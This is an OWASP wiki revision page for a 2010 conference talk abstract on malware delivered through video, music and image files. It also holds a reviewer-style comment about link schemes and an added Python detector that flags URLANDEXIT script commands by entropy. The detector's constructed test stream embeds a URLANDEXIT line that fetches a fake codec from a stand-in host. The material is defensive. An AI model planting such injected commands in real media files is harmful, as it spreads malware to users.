
Difference between revisions of "Exploiting the media for fun and profit. Analysis of a new type of web application attacks through media files"

From OWASP
(Created page with '== The presentation == rightAs the criminals adapt, they look for new ways to distribute malware. This talk will examine new types of malware th…')
 
(added link header)
Line 1: Line 1:
 +
[[Image:468x60-banner-2010.gif|link=http://www.owasp.org/index.php?title=OWASP_AppSec_DC_2010]]
 +
 +
[https://guest.cvent.com/EVENTS/Register/IdentityConfirmation.aspx?e=d52c6f5f-d568-4e16-b8e0-b5e2bf87ab3a Registration] | [https://resweb.passkey.com/Resweb.do?mode=welcome_gi_new&groupID=2766908 Hotel] | [http://www.dcconvention.com/ Walter E. Washington Convention Center]
 +
<br>
 
== The presentation  ==
 
== The presentation  ==
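Review bot: the banner's link= target (http://www.owasp.org/index.php?title=OWASP_AppSec_DC_2010) and the convention center link are plain http://, while the registration and hotel links added on the same row are https://. Point the banner at the https:// form of the wiki URL if the site serves it, so a click on the page header cannot be redirected in transit.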
  

Revision as of 04:56, 21 September 2010


Registration | Hotel | Walter E. Washington Convention Center

The presentation

As the criminals adapt, they look for new ways to distribute malware.

This talk will examine new types of malware that spread through online videos, music files, and images. We begin by analyzing media malware trends, and discover that many of the attacks are not targeted and that they usually rely on social engineering and blackhat search engine optimization. Next, we provide a taxonomy of different attack vectors. We show that music and video files are commonly infected via URLANDEXIT script injection or DRM licensing abuse, where a user is tricked into downloading a "fake codec". We analyze a growing trend of fake YouTube sites covering the latest news events. These sites are often advertised through social networking sites, such as Facebook. We demonstrate how easy it is to set up such sites via a YTFakeCreator toolkit. We then discuss how images of Angelina Jolie have been used in the past to exploit the JPEG GDI buffer overflow vulnerability, and how this attack is still prevalent today. Finally, we discuss some protection mechanisms, ranging from OS configuration changes that disable URLANDEXIT commands to a custom tool (to be open-sourced after the talk) that can help detect the malware before the entire video is downloaded. Our tool uses some innovative ideas, such as sequential downloads of the media file and entropy analysis to detect injected script commands.
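The sequential-download and entropy idea from the abstract, as an added example; it is not the speakers' tool and not code from the talk. The window size, threshold, marker encodings, function names and the sample stream are assumptions, and the sample bytes are constructed.

```python
import math
import random
from collections import Counter

WINDOW = 256      # bytes per entropy window (assumed value)
THRESHOLD = 6.0   # bits per byte; random-looking media data measures about 7 here
# Assumption: the command type may appear as ASCII or as UTF-16LE text.
MARKERS = (b"URLANDEXIT", "URLANDEXIT".encode("utf-16-le"))

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def scan_stream(chunks, window=WINDOW, threshold=THRESHOLD):
    """Scan chunks in arrival order and stop at the first low-entropy window
    that holds a marker. Returns (offset, entropy, bytes_read) or None."""
    buf, base, read = b"", 0, 0

    def check(win, off):
        h = shannon_entropy(win)
        if h < threshold and any(m in win for m in MARKERS):
            return off, h, read
        return None

    for chunk in chunks:
        read += len(chunk)
        buf += chunk
        while len(buf) >= window:
            hit = check(buf[:window], base)
            if hit:
                return hit  # caller can abort the download here
            # Half-window step so a marker straddling a boundary is seen whole.
            buf, base = buf[window // 2:], base + window // 2
    return check(buf, base) if buf else None

def make_stream(infected, chunk=512, seed=1):
    """Constructed data: pseudo-random bytes standing in for compressed media,
    optionally with a UTF-16LE script command placed at offset 1024."""
    rng = random.Random(seed)
    noise = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    cmd = ("URLANDEXIT\0http://example.invalid/get-codec?src="
           + "video-player-update-" * 5).encode("utf-16-le")
    data = noise(1024) + (cmd if infected else b"") + noise(4096)
    return [data[i:i + chunk] for i in range(0, len(data), chunk)]
```

The entropy test is the cheap pre-filter and the marker match is the confirmation, so a low-entropy header with no script command is not reported.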

The speaker

Speaker bio will be posted shortly.